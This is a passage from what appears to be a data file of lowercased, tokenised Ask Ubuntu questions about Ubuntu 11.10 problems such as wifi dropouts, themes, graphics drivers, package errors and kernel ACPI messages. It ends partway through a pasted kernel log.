86342	wifi randomly disconnects , drops out with an rtl 8187	my connection randomly disconnects and prompts me again to input the passphrase for the wifi , i 'm typing the password correctly and slowly . it does not connect until i turn off and turn on the wireless . i 'm using wpa personal and my wireless usb is rtl 8187 it seems like it is frequently dropping off the connection when i 'm using transmission bittorrent client , and seldomly if not . here is the link of my thread on ubuntuforums , which unfortunately no one replied to it . ubuntuforums-zxca
86344	how to make my url look like this ... ?	i was wondering how to make my website 's url look from : some_folder/ ? d=some_file.php to.. / ? d=some_file.php
86347	gnome 3.2 theme does not change	i am having trouble changing my gnome 3.2 themes . after i download and extract themes , i try to use them using gnome tweak tool . only the title bar is affected and nothing else ( icons , borders , etc ) changes . i am a complete newbie to ubuntu and i am currently using ubuntu 11.10 . please help !
86352	how to get gtk3 checkboxes in certain themes ?	xubuntu 11.10 introduces some gtk3 applications which do n't play well with gtk2 themed apps . base gtk3 theme is quite ugly , so i tried a couple of themes with both gtk2/3 components like `` elegant brit '' or `` evolve '' . i noticed that the checkboxes are missing in quite a lot of these themes . one only sees a very slight hover effect over the checkable line , but no box . the check-mark is visible though . for example : audacious with elegant brit theme : is there an easy way ( a simple line in some configfile ) to get the checkboxes back ? maybe point me to a good guide to gtk themeing ? is there a program to switch gtk3 themes ( not gnome-tweak-tool , which grabs the whole gnome-shell as dependency ) ?
86355	difference between menu shutdown and 'shutdown -h now '	what is the difference between the shutdown menu item and shutdown -h now ? the former sometimes hangs up my laptop on ubuntu 11.10 .
86358	how to obtain installed package files ?	i need to download all packages i already installed on ubuntu 11.10 x64 . there should be in /var/cache/apt/archives i know , but there are only 300 mb of deb files . i installed a lot of development packages that there are not there right now . i think system cleans the cache automatically ! now i want to download all packages installed on system , else than packages that are installed by default .
86359	11.10 wubi not able to access windows drives	earlier have installed ubuntu 11.04 using wubi and from my ubuntu , i was able to access my windows drives ( places > ... ) now i have upgraded to 11.10 and now i am not able to access the same any thoughts ... thanks in advance siva
86360	switching tabs in gedit 3 . * with the mouse wheel	i use gedit a lot and thus tend to have a lot of tabs open at any one time . in gedit 2 . * i could switch between tabs using my mouse wheel but since oneiric i ca n't . i assume this is because of various gtk `` upgrades '' . does anybody know of a plugin ( or workable fix -- that does n't require me to recompile everything and its brother ) that will see me back to mousewheeling my day away ?
86364	unable to adjust brightness on a sony vaio f133fxb	i cant control my laptop screen brightness with fn+f5/f6 keys and also with brightness control tool in settings . i tried to edit xorg.conf file but it did n't work ( after restart my ubuntu did n't boot ! ) system info : ubuntu 11.10 ; vaio f133fxb with nvidia 425m graphic card ( updated ) . thanks .
86365	how can i have my vpn connect automatically when the wireless connects ?	i have a working vpn connection using networkmanager , openconnect , and the network-manager-openconnect-gnome package , but i have to start it manually every time i connect to a network , and i have to enter my password manually each time . how can i get it to connect automatically , and remember my password ( securely ) ? i have checked the 'connect automatically ' box on the configure vpn page , but this seems to have no effect . i 've also got the 'start connecting automatically ' box checked in the pop-up box , and that does avoid the need to press the connect button in that window , but seems to have no part in kicking off the whole process in the first place . there is no option to remember the password in the window , but maybe there 's one somewhere else ?
86368	how to set bluetooth to remain disabled after suspend ?	bluetooth is enabled by default , and i do n't want that since i rarely use it and it consumes battery . i know you can enter rfkill block bluetooth in /etc/rc.local , which works upon reboot . but the bluetooth becomes enabled again whenever i resume from suspend . how do i fix that ?
86375	apt-get autocomplete package name is broken	at some moment apt-get install autocomplete was broken it was very useful to me to see packages name with tab press how to repair this autocomplete ?
86376	how-to specify power button to do a 'shutdown -h now ' instead of graphical shutdown menu ?	i would like to specify that when i press the power button in my laptop , a 'shutdown -h now ' command is sent , instead of bringing up the graphical shutdown menu . how can i do that on ubuntu 11.10 ?
86380	i have to install the vim package everytime i reboot the system . suggest me a way to permanently install vim in my ubuntu ( usb ) !	i boot ubuntu from my usb . the vim package vanishes automatically every time i reboot the system . is it because i am using a usb to boot ubuntu ? suggest me a way to install the vim package permanently on my usb .
86382	alt+tab for switching applications does not look like expected	switching between applications with alt+tab works properly but it does not like the screen shots on the ubuntu website . instead it looks similar like i had with gnome2 in previous versions . z .
86383	how i can get verdana postscript type1 font ?	i need to use verdana with cp1251 in my project . where can i get you ?
86384	make webcam work with skype	got 11.10 recently and as usual wanted to make skype video work by doing this http : //community.linuxmint.com/tutorial/view/219 well that used to work for my linux mint 11 installation but now it does not seem to work anymore . anyone else got this problem ?
86387	how to deploy multiple charms on the bootstrapped node or on a single node ?	i 've been wondering if it is possible to deploy a charm , say for example , a wordpress charm to a single node . i.e . bootstrapped node + mysql node + wordpress node = 1 node one scenario can be : deployments that do not require high availability and get very little traffic .
86391	theme integration not working for various apps ( xubuntu )	yesterday i posted a question about libreoffice not showing the correct theme in xubuntu 11.10 . that question was quickly answered and by installing libreoffice-gtk it now looks really nice and in line with my global theme ( ambiance for xubuntu , found here ) . however , i have now noticed that various other programmes are also affected . e.g . the ubuntu software centre , evince , startup disk creator and the update manager . is there a global solution to have these apps and programmes to show the correct theme as well ( and not the ugly windows 98 look they have now ? ) i already tried the solution offered here ( installing qt-qtconfig ) and here ( making script for qt programmes ) , but both do not work . i guess they are not qt programmes ? i also installed evince-gtk , but that didn help either ( for evince ) .
86393	how can i add `` root '' privileges in lxpanel launcher ?	how can i add `` root '' privileges in lxpanel launcher ( in lubuntu ) ? i would like have launcher for synaptic , but synaptic need root privileges . have anyone any idea how it do it ?
86394	how to fix error when authenticating in u1	like other users , when authenticating in u1 i get this error : method `` createitem '' with signature `` a { sv } ( oayay ) b '' on interface `` org.freedesktop.secret.collection '' does n't exist . and in /var/log/auth.log : gnome-keyring-daemon [ 4793 ] : egg_symkey_generate_simple : assertion `iterations > = 1 ' failed gnome-keyring-daemon [ 4793 ] : could n't prepare to write out keyring : /home/yann/.gnome2/keyrings/login_1.keyring so i tried to move `` login.keyring '' . i typed no password for the security when logging into u1 , accepted non secured way to save passwords . and a message told me the operation successfully completed ( in french ) . but , sync did not work . and u1sdtool -- status returned this : state : auth_failed connection : with user with network description : auth failed is_connected : false is_error : true is_online : false queues : working i 'm sorry u1 does n't work anymore ; it was really useful to me . can you help me ? ubuntu 11.10
86396	how can i play music from itunes library stored on mac/windows ?	i have a windows 7 desktop machine and a ubuntu machine too . i may also get a mac one day . i have itunes set up to sync my ipod touch , ipod and the girlfriend 's ipod , but i generally use ubuntu ( she only uses windows ) . how can i listen to my itunes collection from windows through my ubuntu ? i 'm really looking for something that does it in a similar way to itunes over home sharing as i do n't want to bother setting up shares etc . plus if i move my collection to another machine , i want to continue to see it with out issues ! i tried installing itunes through wine , but it does n't work . the app loads but ui messed up !
86397	can not install ati proprietary driver	when i try gladoscc @ comp001 : ~ $ sudo apt-get install fglrx fglrx-amdcccle ( the additional drivers does n't work , gives me errors ) i get : update-alternatives : using /usr/lib/pxpress/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /usr/bin/amdcccle because associated file /usr/lib/fglrx/bin/amdcccle ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/share/applications/ubuntu-amdcccle.desktop because associated file /usr/share/fglrx/amdcccle.desktop ( of link group i386-linux-gnu_gl_conf ) does n't exist . [ and a bunch more of this ] setting up fglrx ( 2:8.881-0ubuntu4.1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group i386-linux-gnu_gl_conf is broken . then loading new fglrx-8.881 dkms files ... building only for 3.0.0-13-generic-pae building for architecture i686 building initial module for 3.0.0-13-generic-pae done . fglrx : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.0.0-13-generic-pae/updates/dkms/ depmod ... . dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... setting up fglrx-amdcccle ( 2:8.881-0ubuntu4.1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.0.0-13-generic-pae processing triggers for libc-bin ... ldconfig deferred processing now taking place this is a laptop , running ati mobility . i 'm not sure of the exact name , as ubuntu will not tell me . i have tried installing the 'post release updates ' too , both via additional drivers and command line , but they give similar errors .
86398	nautilus ignores noauto in fstab	to prevent my mobile beeing mounted as storage , i put the following line in /etc/fstab : /dev/disk/by-uuid/36df-0070 /media/diamond vfat noauto , nouser , defaults 0 0 nautilus seems to ignore this and tries to mount the device , which is only prevented by using the nousers option ( a windows appears , the device can only be mounted by root ) . it seems to be a known bug but the mentioned workaround does n't work for me . any suggestions ?
86404	how do i start banshee in the mode where i can get a crash log	how do i start banshee in the mode where i can get a log ? its crashing while syncing with my cowon iaudio 9 .
86411	can only run firefox 8.0 in safe mode	this is a recent problem but i have no idea what caused it : i can only run firefox in safe mode . any other mode , i get a completely khaki , unresponsive screen , that i have to forcibly terminate . i have uninstalled firefox , and then re-installed it via synaptic . that did n't seem to work . the problem occurs in all the four user accounts i have defined in the ubuntu . i am running an ubuntu 11.10 , amd64 . my firefox is version 8.0 .
86412	how to prevent the font size slider for gnome to mess up kde fonts ?	when using the fontsize slider of gnome-tweak or ubuntu-tweak to e.g . 1.6 multiplier within gnome 3.2 , suddenly when logging into kde 4.7 the fonts of native kde applications like dolphin get messed up . this does n't happen with all applications but with some ( dolphin , amarok , kmail , kde systemsettings ... ) . i tried the setting for gtk-fonts in kde system-settings to be set to `` use my kde fonts in gtk apps '' and also the option `` use own font '' ( maybe mistranslated ) . to the same effect . i can change the fontsize for all kde programs manually to another value , apply the changes , restore the previous settings , apply the changes again an derverything works like expected again . once i log out or reboot and login to kde the fontsizes are messed up again ( as if the multiplier applies to some of kde ! ) . how can i prevent kde from loading the gnome fontsize settings and solve this issue ?
86414	update manager failed with `` the package catalog has broken '' error	i installed ubuntu 11.10 from a live dvd . then went for updating through update manager . it downloaded everything . during installing them the update manager crashed . it showed the error message : the package catalog has broken . installing or removing software is not possible until the package catalog is repaired . however opting for repair did n't work and it continued showing the notification obstinately . i was undone . please show me how i can repair it . @ int_ua apt-get update -f did not work . problem still persists . @ freecode dpkg -- configure -a did not remove the broken package . nevertheless , i found details that the problem might be due to some third-party package . now , how to check whether i am using any third-party package and if so how to disable them ?
86420	graphics driver for my new laptop asus x43ta ( radeon hd 6720g2 1gb is mentioned here	i am new with linux . pls specify the graphics driver for my new laptop asus x43ta ( radeon hd 6720g2 1gb is mentioned on the laptop . and also for my desk top graphics card asus eah3450/htp/512m graphic card works with m2n32sli deluxe asus board and athlon x2 6000+ prossessor . 3d games shows no smooth ness at presently greets and thanks
86424	how to fix gpg error for extras.ubuntu.com oneiric release ?	some days ago my apt-get update has suddenly began to throw w : gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key as far as i understand , this is about a brand ubuntu repository , not something i 've added ( actually i were not adding any repositories and/or changing apt settings those days ) . how to fix this ? the os is xubuntu 11.10 `` oneric ocelot '' x86 . i 've tried sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 16126d3a3e5c1192 and sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 3e5c1192 neither seems to help .
86429	how to change the default wallpaper of a guest account	i want to change the default wallpaper of my guest account , so i can instantly identify if my computer is logged into the guest account . how would i go about doing this
86433	ubuntu 11.10 on modern ssd	there is already quite a lot of questions regarding ssd disks with ubuntu . but the technology moves forward . are there any new things i need to know moving to ssd ? i 'm planning to buy a fast 120gb ssd for my laptop and put the default installation there . ext4 will be a good choice ? then what ? do i still need any optimizations ? the performance will be already better than on regular hdd , so i guess my primary goal is optimizing for lifetime .
86440	problem installng ubuntu along windows 7	i am having troubles installing ubuntu 11.10 on my 80gb drive . everytime i try it always fails to install the grub boot loader . i followed the instructions on on this page any help from anyone ?
86444	error 416 request range not satisfable	i have a problem with the installation of packages through ubuntu software center , or , in general , through apt . i installed cntlm to configure the proxy authentication that i use to connect to the network and i 'm able to connect to the internet through the browser . but when i try to install some packages , ubuntu software center and apt ( if i use the terminal ) return me this error : failed to fetch [ url ] 416 request range not satisfable what 's that ? how can i resolve the problem ? i tried to search something in google but nothing . i tried to change the mirror from the sources.list but the problem persists . someone can help me ? thanks !
86449	how do i disable anti-aliasing in compiz zoom ?	when using the zoom function of compiz , the zoomed-in pixels are anti-aliased ( smoothed ) , which i guess is helpful for accessibility , however i want to actually see an accurate representation of the pixels ( for graphic design purposes ) . is there a way to disable the anti-alias feature ?
86451	i need gui ubuntu server	i am a desktop user ( windows and i am trying to get a gui interface on a new install of 10.04 server how can i do this
86452	how would i install picasa 3.9 ?	i 've noticed a new release of picasa ( 3.9 ) . how would i install it over my current install of picasa ?
86453	gnome shell - network manager . missing features ?	i 'm using gnome shell in ubuntu 11.10 . i ran into a problem with ubuntu when i tried to share my network connection . it sat at connected , failing , connected , failing , continuously . because the connection was not fully working , the `` configure '' button was grayed out . i was unable to select it in order to go into ipv4 settings and switch it back to regular dhcp . the fix ? logged out , logged in to another desktop environment which contained the features i needed , and switched it back . wow . really ? why are these features missing ? why can i not select `` configure '' at any time i want ? this is extremely counter productive .
86456	on-screen keyboard shows up on resume	i recently got ubuntu 11.10 and i was looking through the programs and saw onboard and did n't know what is was so i clicked on it . i know now that it is an onscreen keyboard and i do n't need it so i quit it . i left my computer for a while and came back shook the mouse and when it goes to the login screen to resume the onboard keyboard is there and i ca n't close it . so i logged in and ended the process from the system monitor . i left again and when i came back it did the same thing and when i checked system monitor after logging in onboard did n't know up so it was n't running . how do i get it to go away ? p.s . if you need screenshots i 'll post some when i get home .
86458	ubuntu server on laptop - power off display when close lid	running ubuntu server 11.10 on a laptop . i would like to find a way to have the lcd display power off when i close the lid . do n't want to burned it out . tried search for an hour , but could n't find a solution anywhere . at least not for the server version . please note , this is the server version i am asking about . there is no gui . tried searching for `` ubuntu server '' with words like `` power management '' , `` lid close '' , `` display power '' , etc . new : i found a way to detect if the laptop lid is closed with the acpid daemon . is there any kind of power management command that will power off the display ?
86464	system hangs on `` open document '' right click context menu ( xubuntu )	ok i recently installed xubuntu 11.10 and i enjoy working with it . however , one issue that really stresses me , is the following ; when i open thunar anywere , and right click to open the context menu , all goes well . however , when i hoover over the `` open document '' option , the system hangs for about 10 seconds . during that 10 seconds , nothing happens and nothing can be done . i have googled quite a bit , but so far did n't find anything . i now know to add items to the thunar menu , but that did n't solve anything . any help is appreciated !
86465	switch from nvidia to internal intel hd graphics - opengl does not work	i switched today to the internal intel hd graphics of my g630t cpu . the desktop works but xbmc would not start . it complains that it needs opengl accelerated hardware . when i check the system info - graphics , there is only a generic ( ? ) card listed : driver ( with the space in the beginning ) experience standard then i checked lshw -c video *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : fb800000-fbbfffff memory : e0000000-efffffff ioport : ff00 ( size=64 ) i am not sure if here is everything correct but it seems not completely wrong to me . however , glxinfo is definitively strange : glxinfo name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . i am running ubuntu 11.10 3.0.0-13-generic # 22-ubuntu smp and help is very much appreciated , as i have no clue what i could do ( beginner in linux ) . martur
86466	custom pygtk dialog with glade	i 'm building simple pygtk app using glade ui designer . i followed pattern from default ubuntu app , where preferences and about dialog are implemented extending gtk.dialog , so i added new dialog with similar code ( 2 classes ) . i added new dialog , but i want new dialog to be my custom saveprojectrepositorynotifierdialog which is extended from gtk.dialog . i ca n't find how to set class name in glade for my dialog ? so i changed it manually . before : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < interface > < requires lib= '' gtk+ '' version= '' 2.16 '' / > < ! -- interface-requires preferences_repository_notifier_dialog 1.0 -- > < ! -- interface-naming-policy project-wide -- > < object class= '' gtkdialog '' id= '' save_project_dialog '' > < property name= '' can_focus '' > false < /property > < property name= '' border_width '' > 5 < /property > ... after : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < interface > < requires lib= '' gtk+ '' version= '' 2.16 '' / > < ! -- interface-requires preferences_repository_notifier_dialog 1.0 -- > < ! -- interface-naming-policy project-wide -- > < object class= '' saveprojectrepositorynotifierdialog '' id= '' save_project_dialog '' > < property name= '' can_focus '' > false < /property > < property name= '' border_width '' > 5 < /property > .. but after that change dialog is empty in glade and i ca n't add child widgets to it ! how can i make custom dialog with glade ? is there a way to set class for dialog from glade or there is another way around ?
86468	blurred desktop with nouveau drivers for nvidia gpu at lower resolution	a friend is having desktop with on-board nvidia graphics ( its an asus motherboard without discrete gpu ) . i 've made clean install of ubuntu 11.10 and than installed gnome shell . and i had following issues . the shell graphics were looking sluggish ( white bars on top panel , etc ) . screen alignment was improper . so i installed `` recommended '' nvidia drivers from additional drivers utility . after installation and reboot , i got top panel and other shell elements looked fine . screen alignment also got proper at native resolution of monitor ( 1366x768 ) . but gnome shell performance got sloppy and animations were not smooth , and viewing activities overview looked like shell is freezed . so i uninstalled the drivers , and reverted back to nouveau , but i was surprized that shell top panel looks fine even after removal of drivers , and even shell animations are smooth and perfect . but again i have screen alignment improper and portion of desktop was outside screen area at monitor 's native resolution . so i opened displays and changed the resolution to 1280x720 ( which is not the resolution i have for the same system in its windows 7 installation , 1366x768 ) . but at this resolution with no nvidia drivers installed . i have all the issues solved acccept a new one . the desktop looks little bit hazy and fonts look like little blurred . i know this usually happens when you switch to the resolution lower than the recommended . but looking at the issues i 've faced with proprietary drivers , this is the best working state i 've attained for the system . note : i also tried installing updated nvidia-current package from ppa : ubuntu-x-swat/x-updates and that also did n't worked and at some point ( may be due to my mistake ) made system unbootable to ubuntu , so i got is back to working by purging the ppa and deleting xorg.conf file that the driver utility created .
86470	how to theme nautilus ' resize area/handle border ?	i 'd like to change the visual appearance of the marked resize border/areas in nautilus : if i knew how those elements are named in gtk+ , i 'm sure i could find out what i 'd need to add to /usr/share/themes/ambiance/gtk-3.0/apps/nautilus.css .
86472	why are the caps lock and num lock indicators not working on my keyboard ?	recently i 've upgraded my ubuntu . when i press the caps-lock its indicator on my keyboard turns on , but it does n't turn off when i press it again ! and also i 've got problem with numlock key . when i press it , it 's light indicator does n't turn on but numlock has actually been activated ! is it a bug ?
86477	is there a keyboard shortcut for the indicator area ?	there is a bunch of functionality that is available in the unity system tray ( open/show pidgin , show amarok , turn on/off wireless , switch wireless network , etc ) . i want to get access to that functionality from the keyboard , but ca n't figure out how . does anyone know if there is a built-in or installable/configurable way to do this ?
86481	how can i view a log of system use ?	is there a log or software application for interpreting , e.g . /var/log/syslog* so that i can get statistics on system use ? i am interested in the frequency of use of a machine by different users ; some statistics about the programs or resources used would also be helpful .
86482	packet tracer : problems with gui usability and look	i have to use packet tracer a lot , and it is very difficult to use now . it hides windows behind the principal window ( for example , a window from a router or a pc ) and it looks horrible . what can i do ? thanks and regards , pd : system is 64bit ubuntu 11.10 with unity .
86483	how can i see or change default run level ?	in the linux / unix administration handbook it mentions that you can edit the /etc/inittab file to change the run level . i do n't have that file on 10.04 . i googled this and found a tip saying that file had been replaced with /etc/event.d/rc-default - however i do n't have that file on my system either . have these been deleted or does 10.04 deal with run levels differently ?
86484	how can i install nvidia driver 96.43.20 ?	to install the nvidia driver 96.43.20 , you must exit the xserver.i used `` sudo lightdm stop '' to do this . the screen then went blank and seemed to be showing a text editor which i do n't know the commands for . how do i get the nvidia run package to run in this environment . trying to install this driver in ubuntu 11.10 has been very frustrating . has anyone posted a step by step installation guide to do this job . if a person knew what they were doing i think it would be an easy job
86486	usb network adaptor ( netgear )	i bought a usb network card ( netgear n300 wireless usb adapter ) . my ubuntu 11.04 does n't recognize it automatically . plus after some research i failed to find any drivers . do you have any suggestions ?
86491	is there a way to access the empathy roster via the user-menu ?	i am new to gnome shell ( just upgraded my system from ubuntu 10.10 to 11.10 and manually installed gnome-shell ) and i am looking for an efficient way to access the empathy roster . the user-menu has an entry to toggle im status , but i did n't find a way to access the roster from that menu . in gnome 2 the empathy roster was available by clicking on the chat-entry in the context menu of `` indicator applet '' ... is there a way to access the empathy roster via the user-menu ?
86492	are there any good music mixers available , equivalent to windows `` mp3 tunes '' ?	in windows my dad used to have a program called mp3 tunes . i have tried running it with wine , and it worked . but strange things kept happening to the program , so it 's not a reliable way to play music . basically i just want to have 2 players ( in a single window ) with these features : preloading tracks in a player without immediately starting them . fading from one track to the other . a timer on each player . these features are also desired , but not required : microphone input . prelistening before loading a song in a player ( through a seperate sound card ) . pitch/tempo control . just being able to browse folders in the filesystem ( without things like a music library ) . here are some screenshots of the program to clarify what i 'm looking for :
86493	i cant get ubuntu 's updates	i was installing virtalbox , everything went fine but now i cant get ubuntu 's updates . i get this error an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'dir ' is not known on line 2 in source list /etc/apt/sources.list.d/virtualbox.list'
86495	lubuntu and firestarter	i 've just switched from ubuntu to lubuntu and i have installed firestarter . is this advised ? the reason i ask is because a whole load of gnome related packages were also installed alongside firestarter . as i understand it , gnome is not part of lubuntu . should i be avoinding anything which requires gnome-based packages now that i am on lubuntu ? is there a better firewall to use with lubuntu finally , after a clean install of lubuntu , i had to go online to get firestarter . does this mean that my system was without protection during this period ? could someone have haxored me during this time ?
86496	how install windows xp , withou cd and any kind , exep a usb	first at all , sorry for my english i argentino and mi problem is that i wan na install windows xp in another hd , but only with a usb , and i`m using ubuntu 11.10 , and all the guides i found only have programs for windows.what should i do ?
86497	xampp php file permissions with ntfs hdd 's as additional media storage	i have 4 drives in my ( yes , physically in the box , sata connected ) ubuntu 10.10 system with xampp installed at the /opt/lampp/ dir on the os drive . the os drive ( ssd , lets call it drive1 for sanity ) has the correct file permissions to allow for php ( user www-data ) to read/write to any of my htdocs and vhosts folder ( s ) . here is my fstab file : uuid=552a7c6b05ceaad2 /media/v1tb ntfs-3g defaults , uid=1000 0 0 uuid=de58539158536775 /media/v1.5tb ntfs-3g defaults , uid=1000 0 0 uuid=3d80c54d5d100280 /media/v2.0tb ntfs-3g defaults , uid=1000 0 0 also , i tried to use the following and it copies just fine : sudo -u www-data cp '/media/v2.0tb/path/to/file ' '/media/v2.0tb/path/to/newfile' what i failed to notice all this time is that the string i was passing to my copy/rename function had a space in it and was n't encapsulated in `` as it should have been due to loose type casting of php . thanks for all of the help !
86499	error about acpi _osc request failed ( ae_not_found )	i have ubuntu server 11.10 64 bit i see an error in kernel.log . this error comes out when the server reboot . some port of grep apci in kernel.log ; dec 5 09:08:51 www kernel : [ 0.588605 ] pci0000:00 : requesting acpi _osc control ( 0x1d ) dec 5 09:08:51 www kernel : [ 0.588667 ] pci0000:00 : acpi _osc request failed ( ae_not_found ) , returned control mask : 0x1d dec 5 09:08:51 www kernel : [ 0.588746 ] acpi _osc control for pcie not granted , disabling aspm which hardware may be cause this error ? root @ www : # grep -r acpi /var/log/kern.log dec 5 09:08:51 www kernel : [ 0.000000 ] bios-e820 : 00000000bf780000 - 00000000bf798000 ( acpi data ) dec 5 09:08:51 www kernel : [ 0.000000 ] bios-e820 : 00000000bf798000 - 00000000bf7dc000 ( acpi nvs ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : rsdp 00000000000fb1a0 00014 ( v00 acpiam ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : rsdt 00000000bf780000 00040 ( v01 022410 rsdt1405 20100224 msft 00000097 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : facp 00000000bf780200 00084 ( v01 022410 facp1405 20100224 msft 00000097 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : dsdt 00000000bf7804b0 0c359 ( v01 a1279 a1279001 00000001 intl 20060113 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : facs 00000000bf798000 00040 dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : apic 00000000bf780390 000d8 ( v01 022410 apic1405 20100224 msft 00000097 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : mcfg 00000000bf780470 0003c ( v01 022410 oemmcfg 20100224 msft 00000097 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : oemb 00000000bf798040 00072 ( v01 022410 oemb1405 20100224 msft 00000097 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : hpet 00000000bf78f4b0 00038 ( v01 022410 oemhpet 20100224 msft 00000097 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : osfr 00000000bf78f4f0 000b0 ( v01 022410 oemosfr 20100224 msft 00000097 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : ssdt 00000000bf798fe0 00363 ( v01 dpgpmm cpupm 00000012 intl 20060113 ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : local apic address 0xfee00000 dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : pm-timer io port : 0x808 dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : local apic address 0xfee00000 dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x01 ] lapic_id [ 0x00 ] enabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x02 ] lapic_id [ 0x02 ] enabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x03 ] lapic_id [ 0x04 ] enabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x04 ] lapic_id [ 0x06 ] enabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x05 ] lapic_id [ 0x84 ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x06 ] lapic_id [ 0x85 ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x07 ] lapic_id [ 0x86 ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x08 ] lapic_id [ 0x87 ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x09 ] lapic_id [ 0x88 ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0a ] lapic_id [ 0x89 ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0b ] lapic_id [ 0x8a ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0c ] lapic_id [ 0x8b ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0d ] lapic_id [ 0x8c ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0e ] lapic_id [ 0x8d ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x0f ] lapic_id [ 0x8e ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : lapic ( acpi_id [ 0x10 ] lapic_id [ 0x8f ] disabled ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : ioapic ( id [ 0x01 ] address [ 0xfec00000 ] gsi_base [ 0 ] ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : ioapic ( id [ 0x03 ] address [ 0xfec8a000 ] gsi_base [ 24 ] ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 0 global_irq 2 dfl dfl ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 9 global_irq 9 high level ) dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : irq0 used by override . dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : irq2 used by override . dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : irq9 used by override . dec 5 09:08:51 www kernel : [ 0.000000 ] using acpi ( madt ) for smp configuration information dec 5 09:08:51 www kernel : [ 0.000000 ] acpi : hpet id : 0x8086a301 base : 0xfed00000 dec 5 09:08:51 www kernel : [ 0.009507 ] acpi : core revision 20110413 dec 5 09:08:51 www kernel : [ 0.499129 ] pm : registering acpi nvs region at bf798000 ( 278528 bytes ) dec 5 09:08:51 www kernel : [ 0.500749 ] acpi : bus type pci registered dec 5 09:08:51 www kernel : [ 0.502747 ] acpi : ec : look up ec in dsdt dec 5 09:08:51 www kernel : [ 0.503788 ] acpi : executed 1 blocks of module-level executable aml code dec 5 09:08:51 www kernel : [ 0.520435 ] acpi : ssdt 